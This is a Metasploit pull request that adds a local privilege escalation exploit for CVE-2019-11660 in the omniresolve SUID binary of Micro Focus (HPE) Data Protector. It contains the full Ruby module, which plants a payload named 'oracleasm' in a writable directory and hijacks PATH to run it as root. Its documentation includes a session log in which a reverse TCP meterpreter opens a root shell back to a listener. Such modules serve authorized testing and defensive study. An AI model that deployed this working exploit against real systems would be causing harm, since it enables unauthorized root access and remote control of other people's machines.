### PR TITLE
Add Linux Micro Focus (HPE) Data Protector Privilege Escalation Module (CVE-2019-11660)

### DIFF
--- a/documentation/modules/exploit/linux/local/omniresolve_suid_priv_esc.md
+++ b/documentation/modules/exploit/linux/local/omniresolve_suid_priv_esc.md
@@ -1,0 +1,76 @@
+## Description
+
+  This module exploits the trusted $PATH environment
+  variable of the SUID binary `omniresolve` in
+  Micro Focus (HPE) Data Protector A.10.40 and prior.
+
+  The `omniresolve` executable calls the `oracleasm` binary using
+  a relative path and the trusted $PATH, which allows an attacker
+  to execute a custom binary with `root` privileges.
+
+
+## Vulnerable Application
+
+  This module has been successfully tested on:
+
+  * HPE Data Protector A.09.07: OMNIRESOLVE, internal build 110
+  * Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 118 on CentOS Linux release 7.6.1810 (Core)
+
+  The vulnerability has been patched in:
+  * Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 125
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get a session
+  3. `use exploit/linux/local/omniresolve_suid_priv_esc`
+  4. `set SESSION [SESSION]`
+  5. `check`
+  6. `run`
+  7. You should get a new *root* session
+
+
+## Options
+
+  **SUID_PATH**
+
+  Path to `omniresolve` executable (default: `/opt/omni/lbin/omniresolve`)
+
+  **WritableDir**
+
+  A writable directory file system path. (default: `/tmp`)
+
+
+## Scenario
+
+### DP 10.40 build 118 on CentOS Linux release 7.6.1810 (Core)
+
+  ```
+  msf5 > use exploit/linux/local/omniresolve_suid_priv_esc
+  msf5 exploit(linux/local/omniresolve_suid_priv_esc) > set session 1
+  session => 1
+  msf5 exploit(linux/local/omniresolve_suid_priv_esc) > check
+  [+] The target is vulnerable.
+  msf5 exploit(linux/local/omniresolve_suid_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp 
+  payload => linux/x64/meterpreter/reverse_tcp
+  msf5 exploit(linux/local/komniresolve_suid_priv_esc) > set lhost 192.168.0.113
+  lhost => 192.168.0.113
+  msf5 exploit(linux/local/omniresolve_suid_priv_esc) > run
+  
+  [*] Started reverse TCP handler on 192.168.0.113:4444 
+  [*] Sending stage (3021284 bytes) to 192.168.0.107
+  [*] Meterpreter session 2 opened (192.168.0.113:4444 -> 192.168.0.107:54510) at 2019-10-01 13:19:45 -0400
+  [+] Deleted /tmp/oracleasm
+  [+] Deleted /tmp/gprjmiMGOr
+  
+  meterpreter > getuid
+  Server username: uid=0, gid=0, euid=0, egid=0
+  meterpreter > sysinfo
+  Computer     : 192.168.0.107
+  OS           : CentOS 7.6.1810 (Linux 3.10.0-957.21.2.el7.x86_64)
+  Architecture : x64
+  BuildTuple   : x86_64-linux-musl
+  Meterpreter  : x64/linux
+  meterpreter > 
+  ```

--- a/documentation/modules/exploit/linux/local/omniresolve_suid_priv_esc.md
+++ b/documentation/modules/exploit/linux/local/omniresolve_suid_priv_esc.md
@@ -5,7 +5,7 @@
   Micro Focus (HPE) Data Protector A.10.40 and prior.
 
   The `omniresolve` executable calls the `oracleasm` binary using
-  a relative path and the trusted $PATH, which allows an attacker
+  a relative path and the trusted `$PATH`, which allows an attacker
   to execute a custom binary with `root` privileges.
 
 

--- a/documentation/modules/exploit/linux/local/omniresolve_suid_priv_esc.md
+++ b/documentation/modules/exploit/linux/local/omniresolve_suid_priv_esc.md
@@ -1,6 +1,6 @@
 ## Description
 
-  This module exploits the trusted $PATH environment
+  This module exploits the trusted `$PATH` environment
   variable of the SUID binary `omniresolve` in
   Micro Focus (HPE) Data Protector A.10.40 and prior.
 

--- a/modules/exploits/linux/local/omniresolve_suid_priv_esc.rb
+++ b/modules/exploits/linux/local/omniresolve_suid_priv_esc.rb
@@ -118,7 +118,7 @@ class MetasploitModule < Msf::Exploit::Local
 
     @trigger_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))
     register_file_for_cleanup(@trigger_path)
-    write_file("#{rand_text_alpha(5..10)}:#{rand_text_alpha(5..10)}", @trigger_path)
+    write_file(@trigger_path, "#{rand_text_alpha(5..10)}:#{rand_text_alpha(5..10)}")
     cmd_exec("env PATH=\"#{base_dir}:$PATH\" #{suid_bin_path} -i #{@trigger_path}")
   end
 end

--- a/modules/exploits/linux/local/omniresolve_suid_priv_esc.rb
+++ b/modules/exploits/linux/local/omniresolve_suid_priv_esc.rb
@@ -16,14 +16,15 @@ class MetasploitModule < Msf::Exploit::Local
     super(update_info(info,
       'Name'           => 'Micro Focus (HPE) Data Protector SUID Privilege Escalation',
       'Description'    => %q{
-      This module exploits the trusted $PATH environment variable of the SUID binary omniresolve.
+        This module exploits the trusted `$PATH` environment variable
+        of the `omniresolve` SUID binary.
 
-      This module has been successfully tested on:
-      HPE Data Protector A.09.07: OMNIRESOLVE, internal build 110, built on Thu Aug 11 14:52:38 2016
-      Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 118, built on Tue May 21 05:49:04 2019 on CentOS Linux release 7.6.1810 (Core)
+        This module has been successfully tested on:
+        HPE Data Protector A.09.07: OMNIRESOLVE, internal build 110, built on Thu Aug 11 14:52:38 2016;
+        Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 118, built on Tue May 21 05:49:04 2019 on CentOS Linux release 7.6.1810 (Core)
 
-      The vulnerability has been patched in:
-      Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 125, built on Mon Aug 19 19:22:20 2019
+        The vulnerability has been patched in:
+        Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 125, built on Mon Aug 19 19:22:20 2019
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -60,7 +61,7 @@ class MetasploitModule < Msf::Exploit::Local
 
     register_advanced_options(
       [
-        OptBool.new('ForceExploit', [ false, 'Force exploit even if the current session is root', false ]),
+        OptBool.new('ForceExploit', [ false, 'Override check result', false ]),
         OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
       ])
   end
@@ -75,7 +76,7 @@ class MetasploitModule < Msf::Exploit::Local
 
   def check
     unless setuid? suid_bin_path
-      print_error("#{suid_bin_path} executable is not setuid")
+      vprint_error("#{suid_bin_path} executable is not setuid")
       return CheckCode::Safe
     end
 
@@ -83,27 +84,31 @@ class MetasploitModule < Msf::Exploit::Local
     if info =~ /(?<=\w\.)(\d\d\.\d\d)(.*)(?<=build )(\d\d\d)/
       version = '%.2f' % $1.to_f
       build = $3.to_i
+      vprint_status("omniresolve version #{version} build #{build}")
+
       unless Gem::Version.new(version) < target[:upper_version] ||
              (Gem::Version.new(version) == target[:upper_version] && build <= 118)
-        print_error("omniresolve version #{version} build #{build} is not vulnerable")
         return CheckCode::Safe
       end
-    else
-      print_error("Could not parse omniresolve -ver output")
-      return CheckCode::Detected
+
+      return CheckCode::Appears
     end
 
-    CheckCode::Vulnerable
+    vprint_error("Could not parse omniresolve -ver output")
+    CheckCode::Detected
   end
 
   def exploit
     if check == CheckCode::Safe
-      fail_with(Failure::NotVulnerable, "Target is not vulnerable")
+      unless datastore['ForceExploit']
+        fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.')
+      end
+      print_warning 'Target does not appear to be vulnerable'
     end
 
     if is_root?
       unless datastore['ForceExploit']
-        fail_with(Failure::BadConfig, "Session already has root privileges. Set ForceExploit to override.")
+        fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
       end
     end
 
@@ -111,14 +116,14 @@ class MetasploitModule < Msf::Exploit::Local
       fail_with(Failure::BadConfig, "#{base_dir} is not writable")
     end
 
-    @payload_path = File.join(base_dir, "oracleasm")
-    register_file_for_cleanup(@payload_path)
-    write_file(@payload_path, generate_payload_exe)
-    chmod(@payload_path)
+    payload_path = File.join(base_dir, 'oracleasm')
+    register_file_for_cleanup(payload_path)
+    write_file(payload_path, generate_payload_exe)
+    chmod(payload_path)
 
-    @trigger_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))
-    register_file_for_cleanup(@trigger_path)
-    write_file(@trigger_path, "#{rand_text_alpha(5..10)}:#{rand_text_alpha(5..10)}")
-    cmd_exec("env PATH=\"#{base_dir}:$PATH\" #{suid_bin_path} -i #{@trigger_path} &")
+    trigger_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))
+    register_file_for_cleanup(trigger_path)
+    write_file(trigger_path, "#{rand_text_alpha(5..10)}:#{rand_text_alpha(5..10)}")
+    cmd_exec("env PATH=\"#{base_dir}:$PATH\" #{suid_bin_path} -i #{trigger_path} & echo ")
   end
 end

--- a/modules/exploits/linux/local/omniresolve_suid_priv_esc.rb
+++ b/modules/exploits/linux/local/omniresolve_suid_priv_esc.rb
@@ -16,8 +16,13 @@ class MetasploitModule < Msf::Exploit::Local
     super(update_info(info,
       'Name'           => 'Micro Focus (HPE) Data Protector SUID Privilege Escalation',
       'Description'    => %q{
-        This module exploits the trusted `$PATH` environment variable
-        of the `omniresolve` SUID binary.
+        This module exploits the trusted `$PATH` environment
+        variable of the SUID binary `omniresolve` in
+        Micro Focus (HPE) Data Protector A.10.40 and prior.
+
+        The `omniresolve` executable calls the `oracleasm` binary using
+        a relative path and the trusted environment `$PATH`, which allows
+        an attacker to execute a custom binary with `root` privileges.
 
         This module has been successfully tested on:
         HPE Data Protector A.09.07: OMNIRESOLVE, internal build 110, built on Thu Aug 11 14:52:38 2016;

--- a/modules/exploits/linux/local/omniresolve_suid_priv_esc.rb
+++ b/modules/exploits/linux/local/omniresolve_suid_priv_esc.rb
@@ -17,11 +17,11 @@ class MetasploitModule < Msf::Exploit::Local
       'Name'           => 'Micro Focus (HPE) Data Protector SUID Privilege Escalation',
       'Description'    => %q{
       This module exploits the trusted $PATH environment variable of the SUID binary omniresolve.
-      
+
       This module has been successfully tested on:
       HPE Data Protector A.09.07: OMNIRESOLVE, internal build 110, built on Thu Aug 11 14:52:38 2016
       Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 118, built on Tue May 21 05:49:04 2019 on CentOS Linux release 7.6.1810 (Core)
-      
+
       The vulnerability has been patched in:
       Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 125, built on Mon Aug 19 19:22:20 2019
       },
@@ -68,7 +68,7 @@ class MetasploitModule < Msf::Exploit::Local
   def base_dir
     datastore['WritableDir'].to_s
   end
-  
+
   def suid_bin_path
     datastore['SUID_PATH'].to_s
   end
@@ -100,7 +100,7 @@ class MetasploitModule < Msf::Exploit::Local
     if check == CheckCode::Safe
       fail_with(Failure::NotVulnerable, "Target is not vulnerable")
     end
-  
+
     if is_root?
       unless datastore['ForceExploit']
         fail_with(Failure::BadConfig, "Session already has root privileges. Set ForceExploit to override.")
@@ -109,7 +109,7 @@ class MetasploitModule < Msf::Exploit::Local
 
     unless writable?(base_dir)
       fail_with(Failure::BadConfig, "#{base_dir} is not writable")
-    end  
+    end
 
     @payload_path = File.join(base_dir, "oracleasm")
     register_file_for_cleanup(@payload_path)

--- a/modules/exploits/linux/local/omniresolve_suid_priv_esc.rb
+++ b/modules/exploits/linux/local/omniresolve_suid_priv_esc.rb
@@ -119,6 +119,6 @@ class MetasploitModule < Msf::Exploit::Local
     @trigger_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))
     register_file_for_cleanup(@trigger_path)
     write_file(@trigger_path, "#{rand_text_alpha(5..10)}:#{rand_text_alpha(5..10)}")
-    cmd_exec("env PATH=\"#{base_dir}:$PATH\" #{suid_bin_path} -i #{@trigger_path}")
+    cmd_exec("env PATH=\"#{base_dir}:$PATH\" #{suid_bin_path} -i #{@trigger_path} &")
   end
 end

--- a/modules/exploits/linux/local/omniresolve_suid_priv_esc.rb
+++ b/modules/exploits/linux/local/omniresolve_suid_priv_esc.rb
@@ -75,7 +75,7 @@ class MetasploitModule < Msf::Exploit::Local
 
   def check
     unless setuid? suid_bin_path
-      print_error('Executable is not setuid')
+      print_error("#{suid_bin_path} executable is not setuid")
       return CheckCode::Safe
     end
 

--- a/modules/exploits/linux/local/omniresolve_suid_priv_esc.rb
+++ b/modules/exploits/linux/local/omniresolve_suid_priv_esc.rb
@@ -90,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Local
       end
     else
       print_error("Could not parse omniresolve -ver output")
-      return CheckCode::Appears
+      return CheckCode::Detected
     end
 
     CheckCode::Vulnerable

--- a/modules/exploits/linux/local/omniresolve_suid_priv_esc.rb
+++ b/modules/exploits/linux/local/omniresolve_suid_priv_esc.rb
@@ -1,0 +1,124 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Micro Focus (HPE) Data Protector SUID Privilege Escalation',
+      'Description'    => %q{
+      This module exploits the trusted $PATH environment variable of the SUID binary omniresolve.
+      
+      This module has been successfully tested on:
+      HPE Data Protector A.09.07: OMNIRESOLVE, internal build 110, built on Thu Aug 11 14:52:38 2016
+      Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 118, built on Tue May 21 05:49:04 2019 on CentOS Linux release 7.6.1810 (Core)
+      
+      The vulnerability has been patched in:
+      Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 125, built on Mon Aug 19 19:22:20 2019
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          's7u55', # Discovery and Metasploit module
+        ],
+      'DisclosureDate' => '2019-09-13',
+      'Platform'       => [ 'linux' ],
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
+      'SessionTypes'   => [ 'shell', 'meterpreter' ],
+      'Targets'        =>
+        [
+          [
+            'Micro Focus (HPE) Data Protector <= 10.40 build 118',
+            upper_version: Gem::Version.new('10.40')
+          ]
+        ],
+      'DefaultOptions' =>
+        {
+          'PrependSetgid' => true,
+          'PrependSetuid' => true
+        },
+      'References'     =>
+        [
+          [ 'CVE', '2019-11660' ],
+          [ 'URL', 'https://softwaresupport.softwaregrp.com/doc/KM03525630' ]
+        ]
+    ))
+
+    register_options(
+      [
+        OptString.new('SUID_PATH', [ true, 'Path to suid executable omniresolve', '/opt/omni/lbin/omniresolve' ])
+      ])
+
+    register_advanced_options(
+      [
+        OptBool.new('ForceExploit', [ false, 'Force exploit even if the current session is root', false ]),
+        OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+      ])
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+  
+  def suid_bin_path
+    datastore['SUID_PATH'].to_s
+  end
+
+  def check
+    unless setuid? suid_bin_path
+      print_error('Executable is not setuid')
+      return CheckCode::Safe
+    end
+
+    info = cmd_exec("#{suid_bin_path} -ver").to_s
+    if info =~ /(?<=\w\.)(\d\d\.\d\d)(.*)(?<=build )(\d\d\d)/
+      version = '%.2f' % $1.to_f
+      build = $3.to_i
+      unless Gem::Version.new(version) < target[:upper_version] ||
+             (Gem::Version.new(version) == target[:upper_version] && build <= 118)
+        print_error("omniresolve version #{version} build #{build} is not vulnerable")
+        return CheckCode::Safe
+      end
+    else
+      print_error("Could not parse omniresolve -ver output")
+      return CheckCode::Appears
+    end
+
+    CheckCode::Vulnerable
+  end
+
+  def exploit
+    if check == CheckCode::Safe
+      fail_with(Failure::NotVulnerable, "Target is not vulnerable")
+    end
+  
+    if is_root?
+      unless datastore['ForceExploit']
+        fail_with(Failure::BadConfig, "Session already has root privileges. Set ForceExploit to override.")
+      end
+    end
+
+    unless writable?(base_dir)
+      fail_with(Failure::BadConfig, "#{base_dir} is not writable")
+    end  
+
+    @payload_path = File.join(base_dir, "oracleasm")
+    register_file_for_cleanup(@payload_path)
+    write_file(@payload_path, generate_payload_exe)
+    chmod(@payload_path)
+
+    @trigger_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))
+    register_file_for_cleanup(@trigger_path)
+    cmd_exec("echo dead:beef > #{@trigger_path}")
+    cmd_exec("env PATH=#{base_dir}:$PATH #{suid_bin_path} -i #{@trigger_path}")
+  end
+end

--- a/modules/exploits/linux/local/omniresolve_suid_priv_esc.rb
+++ b/modules/exploits/linux/local/omniresolve_suid_priv_esc.rb
@@ -119,6 +119,6 @@ class MetasploitModule < Msf::Exploit::Local
     @trigger_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))
     register_file_for_cleanup(@trigger_path)
     cmd_exec("echo dead:beef > #{@trigger_path}")
-    cmd_exec("env PATH=#{base_dir}:$PATH #{suid_bin_path} -i #{@trigger_path}")
+    cmd_exec("env PATH=\"#{base_dir}:$PATH\" #{suid_bin_path} -i #{@trigger_path}")
   end
 end

--- a/modules/exploits/linux/local/omniresolve_suid_priv_esc.rb
+++ b/modules/exploits/linux/local/omniresolve_suid_priv_esc.rb
@@ -118,7 +118,7 @@ class MetasploitModule < Msf::Exploit::Local
 
     @trigger_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))
     register_file_for_cleanup(@trigger_path)
-    cmd_exec("echo dead:beef > #{@trigger_path}")
+    write_file("#{rand_text_alpha(5..10)}:#{rand_text_alpha(5..10)}", @trigger_path)
     cmd_exec("env PATH=\"#{base_dir}:$PATH\" #{suid_bin_path} -i #{@trigger_path}")
   end
 end


### PR DESCRIPTION
Add Micro Focus (HPE) Data Protector Privilege Escalation Module (CVE-2019-11660).
```
  This module exploits the trusted $PATH environment
  variable of the SUID binary `omniresolve` in
  Micro Focus (HPE) Data Protector A.10.40 and prior.

  The `omniresolve` executable calls the `oracleasm` binary using
  a relative path and the trusted $PATH, which allows an attacker
  to execute a custom binary with `root` privileges.
```